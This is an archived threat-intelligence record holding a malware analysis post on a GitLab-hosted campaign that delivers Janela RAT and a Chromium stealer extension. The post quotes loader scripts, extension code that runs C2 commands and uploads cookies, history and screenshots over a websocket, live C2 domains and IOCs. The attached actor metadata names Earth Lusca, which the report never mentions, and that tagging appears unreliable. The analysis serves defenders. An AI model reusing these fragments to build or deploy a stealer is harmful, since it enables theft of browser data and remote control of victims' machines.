{ "id": "ab85c6e3-5b21-47dc-b4e6-a3ff10007555", "created_at": "2026-04-06T01:31:42.058962Z", "updated_at": "2026-04-10T03:36:48.08473Z", "deleted_at": null, "sha1_hash": "4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c", "title": "Janela RAT and a stealer extension delivered together", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 918879, "plain_text": "Janela RAT and a stealer extension delivered together\r\nBy Jason Reaves\r\nPublished: 2025-07-01 · Archived: 2026-04-06 01:28:14 UTC\r\n6 min read\r\nJul 1, 2025\r\nBy: Jason Reaves\r\nJanela RAT appears to be a version or variant of BX RAT according to existing reporting, and was also mentioned\r\ntargeting LATAM by ZScaler[3]. While doing some recent investigations into campaigns we stumbled on a\r\ncampaign ending in the delivery of Janela along with a browser extension designed for stealing data and utilizing\r\nmultiple files from various GitLab accounts.\r\nMSI deliveries from gitlab accounts:\r\nhttps://gitlab.com/mariogadu896/a5da3e9493a2b6993af982874c4a53f5/-/raw/main/_61b10e601b06.msi\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 1 of 11\n\nOthers:\r\nPress enter or click to view image in full size\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 2 of 11\n\ninstaller:\r\n907cff1b76b2e2e44fa6bb41e6b0502733592fee7c18bb9873b9ae2b88bf941c\r\nInside the installer is a number of files:\r\n Date Time Attr Size Compressed Name\r\n------------------- ----- ------------ ------------ ------------------------\r\n2025-06-12 20:58:46 ....A 8623 F_bbdbce168f31\r\n2025-06-12 20:58:46 ....A 1578248 F_3bdda10aab90\r\n2025-06-12 20:58:46 ....A 109 F_e69ef3b45260\r\n2025-06-12 20:58:46 ....A 715 F_dfb49ddcd9b6\r\n------------------- ----- ------------ ------------ ------------------------\r\n2025-06-12 20:58:46 1587695 1622016 4 files\r\nThe files include a zip file and a number of scripts:\r\nF_3bdda10aab90: Zip archive data, at least v2.0 to extract, compression method=deflate\r\nF_bbdbce168f31: Unicode text, UTF-8 text, with CRLF line terminators\r\nF_dfb49ddcd9b6: DOS batch file text, ASCII text, with CRLF line terminators\r\nF_e69ef3b45260: DOS batch file text, ASCII text, with CRLF line terminators\r\nSome of the scripts rely upon the execution flow completing through other scripts, such as the script for setting up\r\nthe custom browser extension relies upon the extension being put in place but that happens later by another\r\nexecutable entirely.\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 3 of 11\n\n$extensionPath = \"C:\\Users\\Public\\Documents\\LPrKz6y2fG\\3a5OxUe6\"\r\n$maxTries = 10\r\n$try = 0\r\nwhile ($try -lt $maxTries) {\r\n if (Test-Path $extensionPath) {\r\n Start-Sleep -Seconds 10\r\n break\r\n } else {\r\n Start-Sleep -Seconds 10\r\n $try++\r\n }\r\n}\r\nUltimately looks for Chromium based browsers to add parameters to the execution to load the extension:\r\n\"--load-extension=`\"$extensionPath`\" --disable-extensions-except=`\"$extensionPath`\" -no-first-run\"\r\nOne of the other scripts contains functionality for unzipping a zip file and building a powershell script to detonate\r\na hardcoded EXE name:\r\necho $process = Start-Process -FilePath \"LPrKz6y2fG.exe\" -WorkingDirectory \"%DEST_DIR%\" -PassThru \u003e\r\necho $process.WaitForExit() \u003e\u003e \"%TEMP%\\start_process.ps1\"\r\nstart \"\" powershell -WindowStyle Hidden -Command \"\u0026 '%TEMP%\\start_process.ps1'; Remove-Item '%TEMP%\\s\r\nInside the zip file:\r\n Date Time Attr Size Compressed Name\r\n2025-06-12 20:58:44 ..... 229 172 com.yourcompany.monitoringapp.json\r\n2025-06-12 20:58:44 ..... 2855936 1193307 LPrKz6y2fG.exe\r\n2025-06-12 20:58:44 ..... 384840 384022 LPrKz6y2fG.zip\r\n2025-06-12 20:58:44 ..... 256 261 LPrKz6y2fG.zip.sig\r\nThe exe, ‘LPrKz6y2fG.exe’, is a GoLang binary that has has the password to the same named Zip file inside of it.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 4 of 11\n\nInside of the zip file is a browser extension and a Janella RAT executable:\r\n Date Time Attr Size Compressed Name\r\n------------------- ----- ------------ ------------ ------------------------\r\n2025-06-12 20:58:44 ..... 294792 156139 BF32FB64-1EF9-4ABF-8806-8B182B7929D4.exe\r\n2025-06-12 20:58:44 ..... 256 289 BF32FB64-1EF9-4ABF-8806-8B182B7929D4.exe.sig\r\n2016-07-08 12:47:08 ..... 192000 81431 protobuf-net.dll\r\n2025-06-12 20:58:44 ..... 256 289 protobuf-net.dll.sig\r\n2020-02-19 07:05:18 ..... 20856 11440 System.Buffers.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Buffers.dll.sig\r\n2022-05-08 00:31:02 ..... 142240 59835 System.Memory.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Memory.dll.sig\r\n2018-05-15 10:29:44 ..... 115856 32896 System.Numerics.Vectors.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Numerics.Vectors.dll.sig\r\n2020-02-19 07:05:16 ..... 16768 8916 System.Runtime.CompilerServices.Unsafe.dll\r\n2025-06-12 20:58:44 ..... 256 289 System.Runtime.CompilerServices.Unsafe.dll.sig\r\n2025-06-12 20:58:38 ..... 83868 28990 3a5OxUe6/bg_d94f45fa.js\r\n2025-06-12 20:58:38 ..... 614 386 3a5OxUe6/ct_cb4f5a58.js\r\n2025-06-12 20:58:38 ..... 1299 757 3a5OxUe6/manifest.json\r\n------------------- ----- ------------ ------------ ------------------------\r\nThe RAT exe name is also referenced in the GoLang binary in relation to a bunch of base64 encoded URLs:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 5 of 11\n\nDecoded URLs:\r\nhttps://gitlab.com/mario1950ams341/rootkit_1206/-/raw/main/file1.csvhttps://gitlab.com/mario1950ams34\r\nInside these files is a base64 encoded C2 domain:\r\n% curl -k https://gitlab.com/mario1950ams341/rootkit_1206/-/raw/main/file1.csv |base64\r\n % Total % Received % Xferd Average Speed Time Time Time Current\r\n Dload Upload Total Spent Left Speed\r\n100 44 100 44 0 0 65 0\r\nhxxps://w51w.worldassitencia[.]com\r\nAfter processing the URLs it will also attempt to generate a config.json file which will be used by later stages:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 6 of 11\n\nThis is interesting because part of the zip file previously unzipped is also a browser extension which has\r\nreferences to the config.json file:\r\n async loadConfig() {\r\n let e = await fetch(chrome.runtime.getURL(\"config.json\"));\r\n if (!e.ok) throw new Error(\"Failed loading config.json\");\r\n return await e.json()\r\n }\r\nCommands issued from the C2 websocket all goes to a single function:\r\n }), this.socket.on(\"connect\",\r\n () =\u003e this.onConnected()),\r\n this.socket.on(\"disconnect\",\r\n () =\u003e this.onDisconnected()),\r\n this.socket.on(\"connect_error\",\r\n o =\u003e this.onError(o)),\r\n this.socket.on(\"command\",\r\n o =\u003e this.handleCommand(o)), n = !0;\r\nExtension command handler:\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 7 of 11\n\nhandleCommand(e) {\r\n switch (e.action) {\r\n case \"screenshot\":\r\n this.captureScreenshot();\r\n break;\r\n case \"execute\":\r\n this.executeNative(e.command);\r\n break;\r\n case \"refresh\":\r\n this.collectReresh();\r\n break;\r\n case \"version\":\r\n this.executeVersion(e);\r\n break\r\n }\r\n }\r\nScreenshot takes at most 800x600 screenshot and sends it off:\r\n maxWidth: e = 800,\r\n maxHeight: t = 600\r\nExecuteNative uses the Chrome.runtime API and chrome.runtime.sendNativeMessage to send the command to be\r\nexecuted to an EXE that will process it. The callback function will handle sending off the results:\r\n executeNative(e) {\r\n chrome.runtime.sendNativeMessage(\"com.yourcompany.monitoringapp\", {\r\n Command: e,\r\n Type: \"command\"\r\n }, t =\u003e {\r\n if (chrome.runtime.lastError) {\r\n this.sendData(\"native_response\", {\r\n type: \"response\",\r\n response: \"[**EERRORRR**]\" + chrome.runtime.lastError.message\r\n });\r\n return\r\n }\r\n this.sendData(\"native_response\", {\r\n type: \"response\",\r\n response: t\r\n })\r\n })\r\n }\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 8 of 11\n\nCollectReferesh involves collecting the system info along with cookies, browsing history, (max 100 results),\r\ninstalled extensions and open tab listing:\r\n async collectReresh() {\r\n this.collectedData.systemInfo = await this.getSystemInfo(), this.collectedData.browse\r\n cookies: await this.getAllCookies(),\r\n history: await this.getBrowserHistory(),\r\n extensions: await this.getInstalledExtensions()\r\n }, this.collectedData.currentState = {\r\n tabs: await this.getOpenTabs()\r\n }, this.sendData(\"ext_response\", {\r\n type: \"refresh\",\r\n payload: this.collectedData\r\n }), chrome.storage.local.set({\r\n lastDataCollection: new Date().toISOString()\r\n })\r\n }\r\nExecuteVersion will load a value that was initiated as an array:\r\n vr = []\r\n executeVersion(e) {\r\n vr = e.data\r\n }\r\nThis data is later used in a way to check if a value that should be a list of strings will be present in the url from the\r\ntab:\r\n function Ds(r) {\r\n try {\r\n return vr.some(e =\u003e r.includes(e))\r\n } catch {\r\n return !1\r\n }\r\n }\r\nIt appears that the generated config from the binary will also contain the repo list. This will be used for C2\r\ncommunications over in this case websocket:\r\n let e = this.config,\r\n t = e.repos,\r\n n = !1;\r\n for (let s of t) try {\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 9 of 11\n\nlet i = await Ls.get(s);\r\n this.socket = he(atob(i.data), {\r\n transports: [\"websocket\"],\r\n reconnection: !1,\r\n query: {\r\n clientId: e.clientId,\r\n tipo: \"extensao\",\r\n username: e.username,\r\n computername: e.computername,\r\n version: ft\r\n }\r\nThe Janela RAT[3] binary itself is obfuscated with the free version of Eziriz .NET reactor[1], a deobfuscator for\r\nthe free version still exists[2].\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThe key for decoding strings is the same as the one mentioned in the ZScaler blog:\r\npublic class Settings\r\n{\r\n public static string PASSWORD = Convert.ToString(8521);\r\n public static string VERSION = \"2.2\";\r\nIOCs\r\nNetwork\r\nteam000analytics.safepurelink.com\r\nw51w.worldassitencia.com\r\nbulder.wordsuporttsk.com\r\nda6b97b245c65193eb231de0314508759a69db35a8f76afc66b4757702a231d0\r\n248ee6233a85daaa3ddc2d9aaf6f24a26969a1f46981aa2a13af0c661fe006d8\r\nVBA related files\r\n666ba2708be3fc6a208d1e961af343a8105959fa87bfd3322a36d6c4e57d1122\r\n6ed7ec9d0c366310d647f44830a6b9bc353a0d8b9e3345253c770bb23a90bdd3\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 10 of 11\n\n97364179ab942af483b973653b89c0dfb8ed5c7d56ed62dbbf7a62933c473fa6\r\ne2a86247b7089a5ffb4d0a3c421cedc044c744d37852ebac17291855c54713cf\r\ne200158dcca9b28c65d297cc2ff44a2183d8228568c2ebf98ac888d494e18649\r\nDisk:\r\n%TEMP%\\start_process.ps1\r\nC:\\Users\\Public\\Documents\\LPrKz6y2fG\\3a5OxUe6\r\nGit accounts:\r\nhttps://gitlab.com/eduardolucenciosbizera/\r\nhttps://gitlab.com/mariogadu896/\r\nhttps://gitlab.com/bnewcbvgeral\r\nhttps://gitlab.com/gitlabworkingg/\r\nReferences\r\n1: https://www.eziriz.com/dotnet_reactor.htm\r\n2: https://0x1.gitlab.io/reverse-engineering/NETReactorSlayer/\r\n3: https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech\r\nSource: https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nhttps://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8" ], "report_names": [ "janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775439102, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c.pdf", "text": "https://archive.orkl.eu/4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c.txt", "img": "https://archive.orkl.eu/4fcf6b6bafbc9ad2245a084aaa3bfabf891adb0c.jpg" } }